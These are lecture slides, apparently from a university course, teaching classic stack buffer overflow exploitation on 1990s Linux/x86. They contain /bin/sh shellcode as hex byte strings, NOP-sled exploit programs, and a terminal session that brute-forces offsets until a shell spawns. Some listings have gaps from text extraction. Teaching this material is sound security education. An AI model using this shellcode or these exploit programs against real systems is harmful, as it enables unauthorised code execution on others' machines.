BufferOverflow-HomeCollegeofEngineeringand缓冲区溢出-家居与环境工程学院

资源描述
Buffer Overflow
Prabhaker Mateti, Wright State University

(Slide transcript. The code listings, assembly and stack diagrams were flattened onto single lines and lost brackets, quotes, backslashes and "<" characters during extraction; they are re-laid out below. Text that could not be recovered is marked in brackets.)

example3.c

void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
    int *ret;

    ret = buffer1 + 12;
    (*ret) += 8;
}

void main() {
    int x;

    x = 0;
    function(1, 2, 3);
    x = 1;
    printf("%d\n", x);
}

Stack Layout Within function()

bottom of                                               top of
memory                                                  memory
           buffer2    buffer1    sfp    ret    a   b   c
<-------   [        ][        ][    ][    ][  ][  ][  ]
top of                                               bottom of
stack                                                   stack

Example3.c main() in assembler

0x8000490: pushl %ebp
0x8000491: movl  %esp,%ebp
0x8000493: subl  $0x4,%esp
0x8000496: movl  $0x0,0xfffffffc(%ebp)
0x800049d: pushl $0x3
0x800049f: pushl $0x2
0x80004a1: pushl $0x1
0x80004a3: call  0x8000470
0x80004a8: addl  $0xc,%esp
0x80004ab: movl  $0x1,0xfffffffc(%ebp)
0x80004b2: movl  0xfffffffc(%ebp),%eax
0x80004b5: pushl %eax
0x80004b6: pushl $0x80004f8
0x80004bb: call  0x8000378
0x80004c0: addl  $0x8,%esp
0x80004c3: movl  %ebp,%esp
0x80004c5: popl  %ebp
0x80004c6: ret
0x80004c7: nop

execve(); exit(0);

What the shellcode has to set up (Linux/x86 execve via int $0x80: EAX = syscall number 0xB, EBX = path, ECX = argv, EDX = envp):
1. A null-terminated string "/bin/sh" somewhere in memory.
2. The address of the string "/bin/sh" somewhere in memory, followed by a null pointer.
3. EAX register = 0xB
4. EBX register = address of "/bin/sh"
5. ECX register = address of the address of "/bin/sh" (i.e. the argv array)
6. EDX register = address of the null pointer.
7. Execute the int $0x80 instruction.
8. Copy 0x1 into the EAX register (exit).
9. Copy 0x0 into the EBX register.
10. Execute the int $0x80 instruction.

(The extracted slide text had the EBX and ECX roles the other way round; the assignment above is the one the assembly and the concrete shellcode on these slides actually implement: movl %esi,%ebx loads the string address, leal 0x8(%esi),%ecx the address of the address.)

execve(argv[0], argv, NULL); exit(0);

    movl string_addr, string_addr_addr
    movb $0x0, null_byte_addr
    movl $0x0, null_addr
    movl $0xb, %eax
    movl string_addr, %ebx
    leal string_addr, %ecx
    leal null_string, %edx
    int  $0x80
    movl $0x1, %eax
    movl $0x0, %ebx
    int  $0x80
    /bin/sh string goes here.

Stack after ret is overwritten

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c
<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           |_|_|               (1)   (2)|_|
           |_|                       (3)
top of                                                        bottom of
stack                                                            stack

(The arrows (1)-(3) of the original slide link the jmp, the call back to popl, and the overwritten return address pointing into the buffer; their exact drawing was lost in extraction.)

Shell Code Outline

    jmp  offset-to-call              # 2 bytes
    popl %esi                        # 1 byte
    movl %esi,array-offset(%esi)     # 3 bytes
    movb $0x0,nullbyteoffset(%esi)   # 4 bytes
    movl $0x0,null-offset(%esi)      # 7 bytes
    movl $0xb,%eax                   # 5 bytes
    movl %esi,%ebx                   # 2 bytes
    leal array-offset(%esi),%ecx     # 3 bytes
    leal null-offset(%esi),%edx      # 3 bytes
    int  $0x80                       # 2 bytes
    movl $0x1,%eax                   # 5 bytes
    movl $0x0,%ebx                   # 5 bytes
    int  $0x80                       # 2 bytes
    call offset-to-popl              # 5 bytes
    /bin/sh string goes here.

Shell code

    jmp  0x26                        # 2 bytes
    popl %esi                        # 1 byte
    movl %esi,0x8(%esi)              # 3 bytes
    movb $0x0,0x7(%esi)              # 4 bytes
    movl $0x0,0xc(%esi)              # 7 bytes
    movl $0xb,%eax                   # 5 bytes
    movl %esi,%ebx                   # 2 bytes
    leal 0x8(%esi),%ecx              # 3 bytes
    leal 0xc(%esi),%edx              # 3 bytes
    int  $0x80                       # 2 bytes
    movl $0x1,%eax                   # 5 bytes
    movl $0x0,%ebx                   # 5 bytes
    int  $0x80                       # 2 bytes
    call -0x2b                       # 5 bytes
    .string "/bin/sh"                # 8 bytes

testsc.c

char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
    int *ret;

    ret = (int *)[… operand lost in extraction …];
    (*ret) = (int)shellcode;
}

aleph1$ gcc -o testsc testsc.c
aleph1$ ./testsc
$ exit
aleph1$

Eliminate 00 bytes

Problem instruction:          Substitute with:
movb $0x0,0x7(%esi)           xorl %eax,%eax
movl $0x0,0xc(%esi)           movb %eax,0x7(%esi)
                              movl %eax,0xc(%esi)

movl $0xb,%eax                movb $0xb,%al

movl $0x1,%eax                xorl %ebx,%ebx
movl $0x0,%ebx                movl %ebx,%eax
                              inc  %eax

exploit1.c

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
    char buffer[96];
    int i;
    long *long_ptr = (long *)large_string;

    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int)buffer;
    for (i = 0; i [… the rest of exploit1.c (presumably the copy of the shellcode into large_string and the overflowing strcpy) and the head of the vulnerable program were lost in extraction; the text resumes inside the vulnerable program's main …] 1)
        strcpy(buffer, argv[1]);
}

exploit2.c

void main(int argc, char *argv[]) {
    bsize = atoi(argv[1]);
    offset = atoi(argv[2]);
    addr = get_sp() - offset;
    buff = malloc(bsize);
    addr_ptr = (long *)buff;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;
    ptr = buff + 4;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = 0;
    memcpy(buff, "EGG=", 4);
    putenv(buff);
    system("/bin/bash");
}

Guessing buffer size and offset:

aleph1$ ./exploit2 600
aleph1$ ./vulnerable $EGG
Illegal instruction
aleph1$ exit
aleph1$ ./exploit2 600 100
aleph1$ ./vulnerable $EGG
Segmentation fault
aleph1$ exit
aleph1$ ./exploit2 600 200
aleph1$ ./vulnerable $EGG
Segmentation fault
aleph1$ exit
.
.
.
aleph1$ ./exploit2 600 1564
aleph1$ ./vulnerable $EGG
$               <- new shell

exploit3.c

void main(int argc, char *argv[]) {
    bsize = atoi(argv[1]);
    offset = atoi(argv[2]);
    addr = get_sp() - offset;
    buff = malloc(bsize);
    addr_ptr = (long *)buff;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;
    ptr = buff + bsize / 2 - strlen(shellcode) / 2;
    memcpy(ptr, shellcode, strlen(shellcode));
    buff[bsize - 1] = 0;
    memcpy(buff, "EGG=", 4);
    putenv(buff);
    system("/bin/bash");
}

Stack after ret is overwritten

bottom of  DDDDDDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     456789ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                    sfp   ret   a     b     c
<------   [NNNNJJSSSSSSSSSSSSSSCCss][ssss][0xD5][0x01][0x02][0x03]
           |_|_|_|_|               (1)   (2)|_|_|
           |_|                           (3)
top of                                                            bottom of
stack                                                                stack

(Note for readers: these slides describe a 1990s Linux/x86 process with an executable stack, fixed stack addresses and no stack canaries; the same overflow on a current system with NX, ASLR and -fstack-protector typically crashes the program rather than spawning a shell, and the EGG-in-environment trick depends on the stack address being predictable.)